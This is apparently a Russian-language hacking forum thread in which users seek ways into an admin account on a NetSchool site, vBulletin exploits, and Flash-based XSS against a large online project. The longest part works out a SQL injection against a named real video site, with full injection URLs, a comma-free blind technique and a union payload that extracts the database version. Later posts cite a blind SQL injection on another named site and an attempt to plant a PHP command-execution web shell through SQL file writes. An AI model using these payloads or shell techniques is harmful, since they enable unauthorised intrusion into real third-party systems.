этот вопрос с сарказмом?) Вообщем,существует сайт с движком NetSchool (4.50 версия). Мне нужно зайти с админского аккаунта. есть какие нибудь уязвимости,и,если можно,написать поподробнее о них.
При использовании WSO шелла, иногда можно опуститься на каталог ниже и увидеть соседние сайты на сервере. Иногда папка имеет название site.com, и тогда я могу просто скопировать название и перейти на сайт, но иногда название не совпадает с доменом. Как узнать точный домен?
Помогите найти что нибудь для vbulletin 3.8.7 pl3. Про сплойт через EggAvatar - знаю, а кроме этого ничего не нашёл.
Подскажите, кто знает. Есть онлайн проект на флеше. Нашел форму которая разрешает загрузку и вывод флеш контента пользователю. (как пример - личные сообщения пропускают и показывают всю флешку). С ActionScript знаком совсем мало. Можно сказать - вообще не знаком Дайте пару советов, если можно с примерами хотя-бы алерта (если это возможно вообще в AS). Можно в ЛС, у кого спортивный интерес) (в проекте более миллиона участников).
Быть может, у кого появятся какие идеи как реализовать. Валидное условие: http://videos.webpronews.com/video/playlist.php?movie_name=ses_jcolborn'+order+by+1--+ Валидное условие: http://videos.webpronews.com/video/playlist.php?movie_name=ses_jcolborn'+or+1=1--+ Невалидное условие: http://videos.webpronews.com/video/playlist.php?movie_name=ses_jcolborn'+or+1=0--+ Неполучилось провести объединение через union, ни через blind конструкции. условие http://videos.webpronews.com/video/playlist.php?movie_name=ses_jcolborn' or 5=find_in_set(substring((SELECT version()),1,1),'1,1,2,3,4,5')--+ не срабатывает, не срабатывает даже substring в чистом варианте виде +or+5=substring(version(),1,1)--+ Если не трудно, то в личку если есть конкретные варианты. С меня бонус P.S. Походу где-то рубиться запятая не давая использовать функции соотв
http://videos.webpronews.com/video/playlist.php?movie_name=ses_jcolborn'+and+1=1+and+substring((@@version)+from+1+for+1)=4+--+ FALSE http://videos.webpronews.com/video/playlist.php?movie_name=ses_jcolborn'+and+1=1+and+substring((@@version)+from+1+for+1)=5+--+ TRUE
Покрутил в сторону join(), но адекватного вывода не нашел(( пока что как вариант написать сплоит под блинд, завтра если будет возможность еще покручу, скуль интересная)
Вот собственно решение найденое мной: ?varparam=value'+or+1='s'+IN+('a')+OR+1='s'+IN+('b')+OR+1='s'+IN+('s')--+ через OR объединяем чарсеты и строим условие )
Вывод. http://videos.webpronews.com/video/playlist.php?movie_name=ses_jcolborn' and 1=2 union select * from (select "ses_jcolborn' and 1=2 union select * from (select version())d join (select 2)e join (select 3)f join (select 4)g join (select 5)h--+")a join (select 2)b join (select 3)c limit 1--+ Если нужны запятые можно в хекс. что бы что то покрутить, нужно понимать хотя бы как оно работает что это за минус, чудо? )
Сканировал сайт нашёл Blind SQL Injection Сайт http://binker.org.ua/reg.html Post запрос code=1&[email protected]®_referer=0®name=-1' or 4 = '5 Можно ли её раскрутить ?
Товарищи добрый день. Мне нужно протестировать пару сканеров. Не подскажите уязвимые сервисы для Винд Сервер 2003?
Приветствую всех. есть скуль есть права могу читать и записывать файлы но файлы php txt и т.д не создаются только html можно создать: 1.php.html но он будит пуст 2.txt.html будит с кодом но с таким <?php system($_POST['ad']); ?><?php system($_POST['ad']); ?> 3.html будит с кодом но с таким <?php system($_POST['ad']); ?><?php system($_POST['ad']); ?> почему то 2 раза записывается в файл выполнение команд видимо не работает из за этого позаливал кучу разных шеллов и все отображаются коряво php во всех не работают залил аплоадер тоже с помощью него не заливают файлы никакие подскажите как сделать правильно чтоб работали команды
